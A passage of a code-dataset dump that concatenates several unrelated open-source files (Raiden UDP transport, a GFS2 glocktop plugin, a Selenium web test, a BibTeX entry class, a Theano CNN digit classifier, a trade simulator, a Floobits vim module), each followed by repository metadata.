Always returns the same AsyncResult instance for equal input.
"""
host_port = self.get_host_port(receiver_address)
echohash = sha3(data + receiver_address)
if echohash not in self.senthashes_to_states:
async_result = AsyncResult()
self.senthashes_to_states[echohash] = SentMessageState(
async_result,
receiver_address,
)
else:
async_result = self.senthashes_to_states[echohash].async_result
if not async_result.ready():
self.transport.send(
self.raiden,
host_port,
data,
)
return async_result
def set_node_network_state(self, node_address, node_state):
self.nodeaddresses_networkstatuses[node_address] = node_state
def receive(self, data):
if len(data) > UDP_MAX_MESSAGE_SIZE:
log.error('receive packet larger than maximum size', length=len(data))
return
# Repeat the ACK if the message has been handled before
echohash = sha3(data + self.raiden.address)
if echohash in self.receivedhashes_to_acks:
return self._maybe_send_ack(*self.receivedhashes_to_acks[echohash])
message = decode(data)
if isinstance(message, Ack):
waitack = self.senthashes_to_states.get(message.echo)
if waitack is None:
if log.isEnabledFor(logging.DEBUG):
log.debug(
'ACK FOR UNKNOWN ECHO',
node=pex(self.raiden.address),
echohash=pex(message.echo),
)
else:
if log.isEnabledFor(logging.DEBUG):
log.debug(
'ACK RECEIVED',
node=pex(self.raiden.address),
receiver=pex(waitack.receiver_address),
echohash=pex(message.echo),
)
waitack.async_result.set(True)
elif isinstance(message, Ping):
if ping_log.isEnabledFor(logging.DEBUG):
ping_log.debug(
'PING RECEIVED',
node=pex(self.raiden.address),
echohash=pex(echohash),
message=message,
sender=pex(message.sender),
)
ack = Ack(
self.raiden.address,
echohash,
)
self.maybe_send_ack(
message.sender,
ack,
)
elif isinstance(message, SignedMessage):
if log.isEnabledFor(logging.INFO):
log.info(
'MESSAGE RECEIVED',
node=pex(self.raiden.address),
echohash=pex(echohash),
message=message,
message_sender=pex(message.sender)
)
try:
self.raiden.on_message(message, echohash)
# only send the Ack if the message was handled without exceptions
ack = Ack(
self.raiden.address,
echohash,
)
try:
if log.isEnabledFor(logging.DEBUG):
log.debug(
'SENDING ACK',
node=pex(self.raiden.address),
to=pex(message.sender),
echohash=pex(echohash),
)
self.maybe_send_ack(
message.sender,
ack,
)
except (InvalidAddress, UnknownAddress) as e:
log.debug("Couldn't send the ACK", e=e)
except (UnknownAddress, InvalidNonce, TransferWhenClosed, TransferUnwanted) as e:
log.DEV('maybe unwanted transfer', e=e)
except (UnknownTokenAddress, InvalidLocksRoot) as e:
if log.isEnabledFor(logging.WARN):
log.warn(str(e))
elif log.isEnabledFor(logging.ERROR):
log.error(
'Invalid message',
message=data.encode('hex'),
)
|
mit
| 2,086,037,826,785,422,800 | 30.572704 | 93 | 0.584899 | false |
sbradley7777/glocktop_analyze
|
glocktop_analyze/plugins/snapshots.py
|
1
|
5213
|
#!/usr/bin/python
"""
@author : Shane Bradley
@contact : sbradley@redhat.com
@copyright : GPLv3
* This plugin outputs the number of snapshots taken for a filesystem, the start
time, and the end time (the time of the last snapshot taken).
* This plugin outputs the filesystem name and the time a snapshot was taken
whenever DLM activity is greater than zero.
"""
import logging
import logging.handlers
import os.path
import glocktop_analyze
from glocktop_analyze.plugins import Plugin
from glocktop_analyze.utilities import ColorizeConsoleText, write_to_file, tableize
from glocktop_analyze.html import generate_css_header, generate_table
from glocktop_analyze.html import generate_footer
class Snapshots(Plugin):
def __init__(self, snapshots, path_to_output_dir, options):
Plugin.__init__(self, "snapshots",
"The stats for the snapshots and dlm activity.",
snapshots, "Snapshot Stats", path_to_output_dir,
options)
self.__start_time = self.get_snapshots_start_time()
self.__stop_time = self.get_snapshots_end_time()
self.__snapshot_count = 0
self.__dlm_activity = []
def __get_text(self, colorize=False):
summary = ""
if (self.get_snapshots()):
snapshots_summary = tableize([[self.get_hostname(), self.get_filesystem_name(),
str(self.__snapshot_count), self.__start_time,
self.__stop_time]],
["Hostname", "Filesystem", "Snapshots",
"Start Time", "Stop Time"], colorize=colorize).strip()
if (snapshots_summary):
summary += "\nThen number of snapshots taken, start time, and end time.\n%s\n" %(snapshots_summary)
if (self.__dlm_activity):
dlm_activity_summary = tableize(self.__dlm_activity, ["Hostname", "Filesystem",
"Snapshot Time",
"Number of DLM Waiters"],
colorize=colorize).strip()
if (dlm_activity_summary):
summary += "\nThe snapshots that contained at least 1 DLM waiter.\n%s\n" %(dlm_activity_summary)
if (summary):
return "%s: %s\n%s\n" %(self.get_title(), self.get_description(), summary)
return ""
def analyze(self):
for snapshot in self.get_snapshots():
self.__snapshot_count += 1
dlm_activity = snapshot.get_dlm_activity()
if (not dlm_activity == None):
self.__dlm_activity.append([self.get_hostname(), self.get_filesystem_name(), snapshot.get_date_time(), dlm_activity.get_waiter_count()])
def console(self):
summary = self.__get_text(colorize=True)
if (summary):
print "%s\n" %(summary.rstrip())
def write(self, html_format=False):
wdata =""
path_to_output_file = ""
if (not html_format):
filename = "%s.txt" %(self.get_title().lower().replace(" - ", "-").replace(" ", "_"))
path_to_output_file = os.path.join(os.path.join(self.get_path_to_output_dir(),
self.get_filesystem_name()), filename)
wdata = self.__get_text(colorize=False)
else:
bdata = ""
if (self.__snapshot_count > 0):
bdata += generate_table([[self.get_hostname(), self.get_filesystem_name(), str(self.__snapshot_count),
self.__start_time, self.__stop_time]],
["Hostname", "Filesystem", "Snapshots", "Start Time", "Stop Time"],
title="Snapshots Taken",
description="The number of snapshots taken and the time that first and the last snapshot taken.")
if (self.__dlm_activity):
bdata += generate_table(self.__dlm_activity,
["Hostname", "Filesystem", "Snapshot Time", "Number of DLM Waiters"],
title="DLM Waiter Count",
description="The number of DLM waiters for a snapshot. Only snapshots with DLM waiter count higher than 0 displayed.")
if (bdata):
wdata = "%s\n%s\n%s" %(generate_css_header(include_css_table=True), bdata, generate_footer())
filename = "%s.html" %(self.get_title().lower().replace(" - ", "-").replace(" ", "_"))
path_to_output_file = os.path.join(os.path.join(self.get_path_to_output_dir(),
self.get_filesystem_name()), filename)
if (wdata):
if (not write_to_file(path_to_output_file, wdata, append_to_file=False, create_file=True)):
message = "An error occurred writing to the file: %s" %(path_to_output_file)
logging.getLogger(glocktop_analyze.MAIN_LOGGER_NAME).debug(message)
|
gpl-3.0
| -5,534,080,927,086,368,000 | 51.656566 | 158 | 0.532707 | false |
commtrack/commtrack-old-to-del
|
tests/deployment/selenium/hq_test.py
|
1
|
3617
|
from selenium import selenium
import unittest, time, re, urllib2
from post import *
import os
import sys
import time
class testingPost(unittest.TestCase):
def setUp(self):
self.verificationErrors = []
self.selenium = selenium("localhost", 4444, "*firefox", server)
self.selenium.start()
def test_testingPost(self):
sel = self.selenium
sel.open("/no_permissions?next=/")
sel.click("link=Log in to CommTrack")
sel.wait_for_page_to_load("30000")
sel.type("id_username", user)
sel.type("id_password", passw)
sel.click("//input[@value='Login']")
# testing creation of xform
sel.wait_for_page_to_load("30000")
sel.click("link=XForms")
time.sleep(3)
if sel.is_text_present("Sample Form 1"):
self.delete_xform(sel)
time.sleep(3)
path = os.path.join(sys.path[0], "sample_form.xhtml")
sel.type("id_file", path)
sel.type("id_form_display_name", "Sample Form 1")
sel.click("//div[@id='xform-register-block']/form/ul/li[3]/input")
sel.wait_for_page_to_load("30000")
sel.click("//input[@value=\"Yes, I'm sure\"]")
sel.wait_for_page_to_load("30000")
try: self.failUnless(sel.is_text_present("Sample Form 1"))
except AssertionError, e: self.verificationErrors.append(str(e))
# testing basic submission of xml (or file) and diff against actual
# copy
submission_number = post(serverhost, domain)
sel.click("link=Submissions")
sel.wait_for_page_to_load("30000")
time.sleep(3)
sel.click("link=%s" % submission_number)
sel.wait_for_page_to_load("30000")
time.sleep(2)
sel.click("link=view full raw submission")
time.sleep(2)
try:
file = open('testupload.xml', 'r')
xml_present = file.read()
self.failUnless(sel.is_text_present(xml_present))
except AssertionError, e: self.verificationErrors.append(str(e))
#test to see if form has been processed
sel.open("/receiver/review")
sel.wait_for_page_to_load("30000")
time.sleep(3)
sel.click("link=%s" % submission_number)
sel.wait_for_page_to_load("30000")
try: self.failUnless(sel.is_text_present("view form data"))
except AssertionError, e: self.verificationErrors.append(str(e))
#test Xform deletion
self.delete_xform(sel)
def tearDown(self):
self.selenium.stop()
self.assertEqual([], self.verificationErrors)
def delete_xform(self, sel):
sel.open("/xforms/")
sel.wait_for_page_to_load("30000")
sel.click("//div[@onclick=\"show_forms('http://dev.commcarehq.org/BRAC/CHP/coakley', '#formlist');\"]")
sel.click("//div[@onclick=\"show_forms('http://dev.commcarehq.org/BRAC/CHP/coakley', '#formlist');\"]")
time.sleep(2)
sel.click("link=drop this form")
sel.wait_for_page_to_load("30000")
sel.click("//input[@value=\"Yes, I'm sure\"]")
sel.wait_for_page_to_load("30000")
try: self.failUnless(not sel.is_text_present("Sample Form 1"))
except AssertionError, e: self.verificationErrors.append(str(e))
sites = {"http://staging.commcarehq.org": ["brian", "test",
"staging.commcarehq.org", "BRAC"]}
if __name__ == "__main__":
for key, value in sites.items():
server = key
user = value[0]
passw = value[1]
serverhost = value[2]
domain = value[3]
unittest.main()
|
bsd-3-clause
| -2,440,084,986,140,611,000 | 35.908163 | 111 | 0.594968 | false |
MisanthropicBit/bibpy
|
bibpy/entry/base.py
|
1
|
1986
|
# -*- coding: utf-8 -*-
"""Base class for all types of entries."""
class BaseEntry:
"""Base class for all types of entries."""
def format(self, **options):
raise NotImplementedError()
def format_auxiliary_entry(self, entry_type, contents, indent=' ',
singleline=True, braces=True):
"""Common formatting for @comment, @string and @preamble entries.
If singleline is True, put the entry on a single line. The contents of
the entry are indented by the indent argument if singleline is False.
If braces is True, surround the entry by braces, else parentheses.
"""
return '@{0}{1}{2}{3}{4}{5}'.format(
entry_type,
'{' if braces else '(',
'' if singleline else '\n' + indent,
contents,
'' if singleline else '\n',
'}' if braces else ')'
)
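# Illustrative sketch (hypothetical values, not taken from the original
# tests) of the single-line output:
#
#     self.format_auxiliary_entry('string', 'x = "y"')
#     # -> '@string{x = "y"}'
#     self.format_auxiliary_entry('string', 'x = "y"', braces=False)
#     # -> '@string(x = "y")'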
@property
def bibtype(self):
raise NotImplementedError()
@property
def bibkey(self):
raise NotImplementedError()
@property
def fields(self):
raise NotImplementedError()
def aliases(self, format):
raise NotImplementedError()
def valid(self, format):
raise NotImplementedError()
def keys(self):
raise NotImplementedError()
def values(self):
raise NotImplementedError()
def __eq__(self, other):
raise NotImplementedError()
def __ne__(self, other):
return not self == other
def __contains__(self, item):
raise NotImplementedError()
def __getitem__(self, field):
"""Return the value for the given field."""
raise NotImplementedError()
def __iter__(self):
for field in self.fields:
yield (field, self[field])
def __len__(self):
raise NotImplementedError()
def __str__(self):
return self.format()
def __repr__(self):
raise NotImplementedError()
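# --- Illustrative sketch, not part of the original module ---
# A minimal concrete subclass showing how format_auxiliary_entry is meant to
# be used by entry types such as @string. The class and attribute names below
# are assumptions made purely for demonstration.
class _ExampleStringEntry(BaseEntry):
    """Toy @string entry illustrating format_auxiliary_entry."""
    def __init__(self, variable, value):
        self.variable = variable
        self.value = value
    def format(self, **options):
        # Renders e.g. '@string{btx = "BibTeX"}'
        contents = '{0} = "{1}"'.format(self.variable, self.value)
        return self.format_auxiliary_entry('string', contents)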
|
mit
| 4,408,465,947,743,820,300 | 24.139241 | 78 | 0.572508 | false |
SummerLW/Perf-Insight-Report
|
dashboard/dashboard/task_runner_test.py
|
1
|
1415
|
# Copyright 2015 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
import mock
from dashboard import task_runner
from dashboard import testing_common
class TaskRunnerTest(testing_common.TestCase):
def setUp(self):
super(TaskRunnerTest, self).setUp()
def _GetMockCallArg(self, function_mock, call_index):
"""Gets the first argument value for call at "call_index".
Args:
function_mock: A Mock object.
call_index: The index at which the mocked function was called.
Returns:
The first argument value.
"""
# See http://www.voidspace.org.uk/python/mock/helpers.html#call and
# http://www.voidspace.org.uk/python/mock/mock.html#mock.Mock.call_args_list
call_args_list = function_mock.call_args_list
if not call_args_list or len(call_args_list) <= call_index:
return None
args, _ = call_args_list[call_index]
return args[0]
@mock.patch.object(task_runner, '_AddReportToLog')
def testRun(self, add_report_to_log_mock):
def SampleTask():
print 'square root of 16'
return 16 ** (1 / 2.0)
task_runner.Run(SampleTask)
self.ExecuteDeferredTasks(task_runner._TASK_QUEUE_NAME)
call_arg = self._GetMockCallArg(add_report_to_log_mock, 1)
self.assertIn('4.0', call_arg)
self.assertIn('square root of 16', call_arg)
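# --- Illustrative sketch, not part of the original test ---
# Shows the (args, kwargs) shape of mock.call_args_list that _GetMockCallArg
# unpacks; the mock and argument values below are made up for demonstration.
def _DemoCallArgsList():
  m = mock.Mock()
  m('first', key=1)
  m('second', key=2)
  args, _ = m.call_args_list[1]  # call at index 1
  return args[0]  # -> 'second'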
|
bsd-3-clause
| 4,223,666,183,864,671,000 | 29.76087 | 80 | 0.695406 | false |
tscloud/hamsalad
|
callservice_class.py
|
1
|
6917
|
#!/usr/bin/env python2
# -*- coding: utf-8 -*-
"""
# Copyright (C) 2014 Tom Cloud
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as published
# by the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
# See file LICENSE which should have been include w/ this software for a
# copy of the license as well as other copyright and license information.
"""
import xml.dom.minidom as mdom, getpass, sys, os, urllib2
class Callservice(object):
"""
This class is a super class to handle service calls to get call sign info
"""
PRINT_SESSION = False
MAX_LOGIN_TRIAL = 3
def __init__(self, agent_name, fpath_name):
"""
setup class
"""
self.SERVICE_PROVIDER = None
self.tag_session = None
self.tag_callsign = None
self.tag_error = None
self.tag_sessionid = None
self.VALID_TAGS = []
self.fpath_agent = fpath_name + '.' + agent_name
self.login_url = None
self.query_url = None
self.session_d = None
@classmethod
def cleanup_one_call(cls, one_call):
"""
get rid of call suffixes b/c qrz does not like them
could do other things
"""
r_idx = one_call.find('/')
if r_idx != -1:
one_call = one_call[:r_idx]
return one_call
@classmethod
def cleanup_call(cls, c_list):
"""
get rid of call suffixes b/c qrz does not like them
could do other things
"""
for i, clean_call in enumerate(c_list):
c_list[i] = Callservice.cleanup_one_call(clean_call)
return c_list
def get_info(self, rt, tag_name):
"""
get_info collects data into dictionary from XML tags specified by subclass
according to service provider.
"""
#print >>sys.stderr, 'get_info...'
ans_d = {}
if not tag_name in self.VALID_TAGS:
return None # error
rtelements = rt.getElementsByTagName(tag_name)
if len(rtelements) < 1:
return None # error
s_elems = rtelements[0].getElementsByTagName('*')
for s in s_elems:
for ss in s.childNodes:
# Ignore if not a text node...
if ss.nodeName == '#text':
ans_d[s.nodeName] = ss.nodeValue
return ans_d
def login(self):
"""
Log in and get session key, prompt if valid key not previously stored.
"""
# need a local so old values are not preserved across calls
l_login_url = None
fr = None
for login_trial in range(Callservice.MAX_LOGIN_TRIAL):
try:
fr = open(self.fpath_agent, 'r') # Do we have a .qrzpy file already?
except IOError: # No, must create one.
print 'Please provide login info for %s XML service...' % self.SERVICE_PROVIDER
user = raw_input('Username: ')
pwd = getpass.getpass('Password: ')
### here's where we set the login URL
l_login_url = self.login_url % (user, pwd)
# Unix dependencies
try:
fw = open(self.fpath_agent, 'w')
fw.write(l_login_url)
except:
print >>sys.stderr, sys.exc_info()[1]
print >>sys.stderr, '** Can\'t write to %s' % self.fpath_agent
sys.exit()
fw.close()
os.chmod(self.fpath_agent, 0600) # a little security
else:
### here's where we set the login URL
l_login_url = fr.read().strip()
# We've got a login_url, but will it be accepted?
fd = urllib2.urlopen(l_login_url)
doc = mdom.parse(fd) # Construct DOM w/ Python heavy lifting
rt = doc.documentElement # Find root element
self.session_d = self.get_info(rt, self.tag_session)
if self.tag_error in self.session_d: # No, that key won't work.
print >>sys.stderr, '** Error ** %s' % self.session_d[self.tag_error]
print 'Reenter password info, please.'
# Unix dependency: remove .qrzpy file if it exists
try:
fr.close()
os.remove(self.fpath_agent)
except OSError:
pass
continue # try again, please.
break # We're authenticated OK now, stop loop
else: # End of 'for' loop, no success
print >>sys.stderr, 'Login trial limit exceeded. Sorry'
sys.exit()
if 'Alert' in self.session_d:
print '** Alert ** %s' % self.session_d['Alert']
if 'Expires' in self.session_d:
print 'Note: QRZ.com account expires %s' % self.session_d['Expires']
if Callservice.PRINT_SESSION: # This is usually uninteresting
print '--------Session'
for x in self.session_d:
print x, self.session_d[x]
print
fd.close()
def get_data_for_call(self, call):
"""
For requested call, get its data.
"""
# remember QRZ needs call to be cleaned up
### here's where we set the query URL
l_query_url = self.query_url % (self.session_d[self.tag_sessionid], Callservice.cleanup_one_call(call))
fd = urllib2.urlopen(l_query_url) # access XML record from Internet
doc = mdom.parse(fd) # Construct DOM with Python magic
rt = doc.documentElement # Find root element
fd.close()
        # print >>sys.stderr, 'About to return from call to %s' % self.SERVICE_PROVIDER
# return self.get_info(rt, 'Callsign') # Place XML data into friendly dictionary
return self.get_info(rt, self.tag_callsign) # Place XML data into friendly dictionary
def removefile(self):
"""
remove agent file
"""
try:
os.remove(self.fpath_agent)
except:
print >>sys.stderr, '** %s could not be removed.' % self.fpath_agent
else:
print '%s removed.' % self.fpath_agent
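# --- Illustrative sketch, not part of the original module ---
# Shows how a concrete lookup service is expected to configure this
# superclass. The provider name, URL templates and XML tag names below are
# assumptions for demonstration only, not a real service definition.
class ExampleCallservice(Callservice):
    """Toy subclass wiring up the attributes Callservice expects."""
    def __init__(self, fpath_name):
        Callservice.__init__(self, 'example', fpath_name)
        self.SERVICE_PROVIDER = 'Example.com'
        self.tag_session = 'Session'
        self.tag_callsign = 'Callsign'
        self.tag_error = 'Error'
        self.tag_sessionid = 'Key'
        self.VALID_TAGS = [self.tag_session, self.tag_callsign]
        # %s placeholders: username/password for login, session key/callsign
        # for queries.
        self.login_url = 'https://xml.example.com/?username=%s;password=%s'
        self.query_url = 'https://xml.example.com/?s=%s;callsign=%s'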
if __name__ == '__main__':
    print >>sys.stderr, "cannot run from cmd line"
|
agpl-3.0
| -3,144,253,205,164,794,000 | 36.797814 | 111 | 0.556021 | false |
hchim/stockanalyzer
|
simulator/TradeSimulator.py
|
1
|
4978
|
import pandas as pd
import numpy as np
from utils.webdata import get_close_of_symbols
class TradeSimulator(object):
def __init__(self, start_val=1000000, leverage=2.0, allow_short=True):
"""
Parameters
----------
start_val: float
start value of the portfolio
leverage: float
max leverage
allow_short: boolean
allows to sell short
"""
self.start_val = start_val
self.leverage = leverage
self.allow_short = allow_short
def compute_leverage(self, prices, shares, cash, order_type, order_share, order_symbol):
"""
Compute the leverage of the shares
Parameters
----------
prices: Series
shares: dict
contains the current shares for each symbol
cash: float
current cash
order_type: [BUY or SELL]
the type of the order
order_share: int
the number of shares of the order
order_symbol: string
the symbol of the order
Returns
----------
leverage: float
"""
if order_type == 'BUY':
shares[order_symbol] += order_share
cash -= prices[order_symbol] * order_share
else:
shares[order_symbol] -= order_share
cash += prices[order_symbol] * order_share
longs = shorts = 0
for symbol in shares.keys():
if shares[symbol] >= 0:
longs += shares[symbol] * prices[symbol]
else:
shorts -= shares[symbol] * prices[symbol]
leverage = (longs + shorts) / (longs - shorts + cash)
return leverage
def simulate(self, start_date=None, end_date=None, prices=None, orders=None, orders_file=None):
"""Simulate the trades with the given orders and the prices.
Parameters
----------
start_date: string
end_date: string
prices: DataFrame
orders: DataFrame
orders_file: string
Returns
----------
portvals: DataFrame
the daily portfolio values in the simulation
"""
if orders is None:
orders = pd.read_csv(orders_file, parse_dates=True)
symbols = list(set(orders['Symbol']))
if prices is None:
prices = get_close_of_symbols(symbols, start_date, end_date, add_spy=True) # add SPY so as to remove no-trade days
if prices is None:
return None
prices.drop('SPY', axis=1, inplace=True) # remove SPY
dates = prices.index # update dates
# init daily shares
shares = prices.copy() # record the shares every day
shares.loc[:, :] = np.nan
last_share = dict.fromkeys(shares.columns, 0) # record the total shares of each symbol
# init daily cashes
cashes = pd.Series({'Cash':np.nan}, index=dates) # record the daily cashes
last_cash = self.start_val # record total cash
# iterate orders and simulate the trades
for i in range(len(orders)):
symbol = orders.loc[i, 'Symbol']
share = orders.loc[i, 'Shares']
date = orders.loc[i, 'Date']
operate = orders.loc[i, 'Order']
price = prices.loc[date, symbol]
# check leverage
tmp_leverage = self.compute_leverage(prices.loc[date, :], last_share.copy(), last_cash,
operate, share, symbol)
if tmp_leverage > self.leverage:
continue
if operate == 'BUY':
last_share[symbol] += share
shares.loc[date, symbol] = last_share[symbol]
val = last_cash - price * share
cashes[date] = last_cash = val
else:
temp_share = last_share[symbol] - share
# short check
if not self.allow_short and temp_share < 0:
continue
shares.loc[date, symbol] = last_share[symbol] = temp_share
last_cash += price * share
cashes[date] = last_cash
# init the nan values of the first row of shares before invoking fillna
for symbol in shares.columns:
if pd.isnull(shares.loc[dates[0], symbol]):
shares.loc[dates[0], symbol] = 0
shares.fillna(method="ffill", inplace=True)
# init the nan value of the first row of cashes before invoking fillna
if pd.isnull(cashes.ix[0]):
cashes.ix[0] = self.start_val
cashes.fillna(method='ffill', inplace=True)
values = (prices * shares).sum(axis=1)
portvals = (values + cashes).to_frame()
portvals.rename(columns={portvals.columns[0]: "Portfolio"}, inplace=True)
return portvals
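# --- Illustrative usage sketch, not part of the original module ---
# Runs a tiny two-order simulation against a hand-made price frame; the
# dates, symbols and share counts below are made up for demonstration.
# An 'SPY' column is included because simulate() may drop it.
def _demo_simulation():
    dates = pd.date_range('2015-01-01', periods=3)
    prices = pd.DataFrame({'AAPL': [100.0, 101.0, 102.0],
                           'SPY': [200.0, 201.0, 202.0]}, index=dates)
    orders = pd.DataFrame({'Date': [dates[0], dates[2]],
                           'Symbol': ['AAPL', 'AAPL'],
                           'Order': ['BUY', 'SELL'],
                           'Shares': [10, 10]})
    sim = TradeSimulator(start_val=10000)
    # Returns a one-column DataFrame of daily portfolio values.
    return sim.simulate(prices=prices, orders=orders)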
|
mit
| -7,645,321,113,309,966,000 | 33.811189 | 126 | 0.537364 | false |
WillBrennan/DigitClassifier
|
DeepConv.py
|
1
|
8479
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
__author__ = 'Will Brennan'
# Built-in Module
import os
import time
import logging
import warnings
import cPickle as pickle
from datetime import datetime
# Standard Modules
import numpy
import sklearn
import theano
import theano.tensor as T
# Custom Modules
import Scripts
import Layers
logger = logging.getLogger('main')
warnings.simplefilter("ignore", DeprecationWarning)
class DeepConv(object):
def __init__(self, debug=False, load=False, save=False):
self.args_debug = debug
self.args_load = load
self.args_save = save
if self.args_debug:
theano.exception_verbosity = 'high'
if self.args_load:
self.load()
else:
self.layers = None
self.test_model = None
self.validate_model = None
self.train_model = None
self.pred_model = None
self.index, self.x, self.y = T.lscalar(), T.matrix('x'), T.ivector('y')
def fit(self, data, labels, test_data, test_labels, learning_rate=0.1, n_epochs=250, nkerns=[20, 50], batch_size=500):
logger.info('Initialising the classifier')
rng = numpy.random.RandomState()
data, labels = Scripts.shared_dataset(data_x=data, data_y=labels)
test_data, test_labels = Scripts.shared_dataset(data_x=test_data, data_y=test_labels)
if batch_size < 1:
batch_size = data.get_value(borrow=True).shape[0]
n_train_batches = data.get_value(borrow=True).shape[0]/batch_size
n_test_batches = test_data.get_value(borrow=True).shape[0]/batch_size
logger.info('Constructing the classifier')
self.layers = []
self.layers.append(Layers.PoolingLayer(
rng,
input=self.x.reshape((batch_size, 1, 28, 28)),
image_shape=(batch_size, 1, 28, 28),
filter_shape=(nkerns[0], 1, 5, 5),
poolsize=(2, 2)
))
self.layers.append(Layers.PoolingLayer(
rng,
input=self.layers[-1].output,
image_shape=(batch_size, nkerns[0], 12, 12),
filter_shape=(nkerns[1], nkerns[0], 5, 5),
poolsize=(2, 2)
))
self.layers.append(Layers.HiddenLayer(
rng,
input=self.layers[-1].output.flatten(2),
n_in=nkerns[1] * 4 * 4,
n_out=500,
activation=T.tanh
))
self.layers.append(Layers.LogisticRegression(
input=self.layers[-1].output,
n_in=500,
n_out=10
))
test_givens = {self.x: test_data[self.index * batch_size: (self.index + 1) * batch_size], self.y: test_labels[self.index * batch_size: (self.index + 1) * batch_size]}
self.test_model = theano.function([self.index], self.layers[-1].errors(self.y), givens=test_givens)
params = self.layers[0].params + self.layers[1].params + self.layers[2].params + self.layers[3].params
cost = self.layers[-1].negative_log_likelihood(self.y)
grads = T.grad(cost, params)
updates = [(param_i, param_i - learning_rate * grad_i) for param_i, grad_i in zip(params, grads)]
train_givens = {self.x: data[self.index * batch_size: (self.index + 1) * batch_size], self.y: labels[self.index * batch_size: (self.index + 1) * batch_size]}
self.train_model = theano.function([self.index], cost, updates=updates, givens=train_givens)
patience, patience_increase = 10000, 2
validation_frequency = min(n_train_batches, patience / 2)
epoch, count = 0, 0
start_time = time.time()
n_iters = n_epochs*n_train_batches
logger.info("Fitting Classifier")
logger.debug("{0} epochs, {1} batches, {2} iterations".format(n_epochs, n_train_batches, n_iters))
while epoch < n_epochs and patience > count:
epoch += 1
for minibatch_index in xrange(n_train_batches):
count = (epoch - 1) * n_train_batches + minibatch_index
if count % 50 == 0:
percentage = round(100.0*count/n_iters, 2)
if percentage == 0:
time_stamp = "Null"
else:
time_stamp = datetime.utcfromtimestamp((time.time()-start_time)*(100.0/percentage)+start_time)
logger.info("training is {0}% complete (Completion at {1})".format(round(percentage, 2), time_stamp))
train_cost = self.train_model(minibatch_index)
if (count + 1) % validation_frequency == 0:
testlosses = [self.test_model(i) for i in xrange(n_test_batches)]
test_score = numpy.mean(testlosses)
logger.info('Test error of {0}% achieved on Epoch {1} Iteration {2}'.format(test_score*100.0, epoch, count+1))
logger.debug("Iteration number {0}".format(count))
logger.debug('Optimization complete.')
logger.debug('Conducting final model testing')
testlosses = [self.test_model(i) for i in xrange(n_test_batches)]
test_score = numpy.mean(testlosses)
t_taken = int((time.time()-start_time)/60.0)
logger.info('Training Complete')
logger.info('Test score of {0}%, training time {1}m'.format(test_score*100.0, t_taken))
if self.args_save:
self.save()
def predict(self, x_data, batch_size=500):
assert isinstance(x_data, numpy.ndarray), "input features must be a numpy array"
assert len(x_data.shape) == 2, "it must be an array of feature vectors"
logger.info('classifier prediction called')
logger.debug('x_data shape: {0}'.format(x_data.shape))
logger.debug('forming prediction function')
x_data = Scripts.shared_dataset(data_x=x_data)
givens = {self.x: x_data[self.index * batch_size: (self.index + 1) * batch_size]}
pred_model = theano.function(inputs=[self.index], outputs=self.layers[-1].y_pred, givens=givens, on_unused_input='warn', allow_input_downcast=True)
logger.debug('input shape: {0}'.format(x_data.get_value(borrow=True).shape))
logger.info('beginning prediction on x_data')
n_batches = x_data.get_value(borrow=True).shape[0]/batch_size
result = []
for batch_index in range(n_batches):
logger.debug('processing batch {0}'.format(batch_index))
batch_result = pred_model(batch_index)
logger.debug('result generated')
result = numpy.hstack((result, batch_result))
logger.debug('output shape: {0}'.format(len(result)))
# batch size, rows, columns, channels.
return result
def score(self, test_data, test_labels, batch_size=500):
logger.info('Generating Classification Score')
logger.debug('creating shared datasets')
test_data, test_labels = Scripts.shared_dataset(data_x=test_data, data_y=test_labels)
logger.debug('producing batch information')
n_test_batches = test_data.get_value(borrow=True).shape[0]
n_test_batches /= batch_size
logger.debug('generating theano functions')
test_givens = {self.x: test_data[self.index * batch_size: (self.index + 1) * batch_size], self.y: test_labels[self.index * batch_size: (self.index + 1) * batch_size]}
test_model = theano.function(inputs=[self.index], outputs=self.layers[-1].errors(self.y), givens=test_givens, on_unused_input='warn')
logger.debug('producing test results')
losses = [test_model(i) for i in range(n_test_batches)]
return 1.0-numpy.mean(losses)
def score_report(self, y_test, y_pred):
scores = sklearn.metrics.classification_report(y_test, y_pred)
logger.info("\n"+scores)
def save(self, path="DeepConvolution.pkl"):
path = os.path.join(os.path.split(__file__)[0], path)
logger.info("Saving layers to {0}".format(path))
with open(path, 'wb') as output:
pickle.dump(self.layers, output, pickle.HIGHEST_PROTOCOL)
logger.debug("Successfully saved")
def load(self, path="DeepConvolution.pkl"):
path = os.path.join(os.path.split(__file__)[0], path)
logger.info("Loading layers from {0}".format(path))
assert os.path.exists(path), "Specified Path is not valid"
with open(path, "rb") as input_file:
self.layers = pickle.load(input_file)
logger.debug("Successfully loaded")
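# --- Illustrative usage sketch, not part of the original module ---
# The expected call sequence; the data arguments are assumed to be MNIST-style
# arrays of flattened 28x28 images (shape [n_samples, 784]) with integer
# labels, loaded elsewhere.
def _demo_usage(train_x, train_y, test_x, test_y):
    clf = DeepConv(save=False)
    clf.fit(train_x, train_y, test_x, test_y, n_epochs=5, batch_size=500)
    predictions = clf.predict(test_x)
    clf.score_report(test_y, predictions)
    return predictions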
|
bsd-2-clause
| 1,989,639,045,380,812,300 | 47.176136 | 174 | 0.608916 | false |
Floobits/floobits-neovim-old
|
plugin/floo/editor.py
|
1
|
2900
|
import sys
from collections import defaultdict
import time
import vim
try:
from .common import shared as G
from .common import msg
except (ImportError, ValueError):
import common.shared as G
from common import msg
timeouts = defaultdict(list)
top_timeout_id = 0
cancelled_timeouts = set()
calling_timeouts = False
line_endings = "\n"
welcome_text = 'Welcome %s!\n\nYou are all set to collaborate. You should check out our docs at https://%s/help/plugins/#sublime-usage. \
You must run \':FlooCompleteSignup\' before you can login to floobits.com.'
def name():
if sys.version_info < (3, 0):
py_version = 2
else:
py_version = 3
return 'Vim-py%s' % py_version
def codename():
return 'vim'
def windows(*args, **kwargs):
return []
def set_timeout(func, timeout, *args, **kwargs):
global top_timeout_id
timeout_id = top_timeout_id
    top_timeout_id += 1
if top_timeout_id > 100000:
top_timeout_id = 0
def timeout_func():
if timeout_id in cancelled_timeouts:
cancelled_timeouts.remove(timeout_id)
return
func(*args, **kwargs)
